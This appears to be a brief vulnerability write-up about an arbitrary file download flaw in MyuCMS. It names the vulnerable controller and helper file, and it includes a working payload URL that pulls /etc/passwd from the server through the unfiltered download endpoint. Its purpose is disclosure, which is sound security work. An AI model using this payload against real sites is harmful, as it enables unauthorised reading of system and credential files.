The point of vulnerability is:       application/bbs/controller/Index.php

Arbitrary File Download Vulnerability in MyuCMS

The key code in the figure is for file download

follow in  "download",which in   extend/org/Http.php

Arbitrary File Download Vulnerability in MyuCMS

There are no protection measures such as filtering, you can download any file directly

example:

payload:http://127.0.0.1/cms/myucms/index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1

Download / etc / passwd on the server and save it as 1.txt

Arbitrary File Download Vulnerability in MyuCMS

After downloading it opens as shown

Arbitrary File Download Vulnerability in MyuCMS

 

Thanks for 0dod

相关文章:

  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-05-27
  • 2021-05-22
  • 2021-06-28
  • 2021-11-29
猜你喜欢
  • 2022-12-23
  • 2022-12-23
  • 2022-02-27
  • 2021-12-25
  • 2022-12-23
  • 2021-12-13
  • 2022-12-23
相关资源
相似解决方案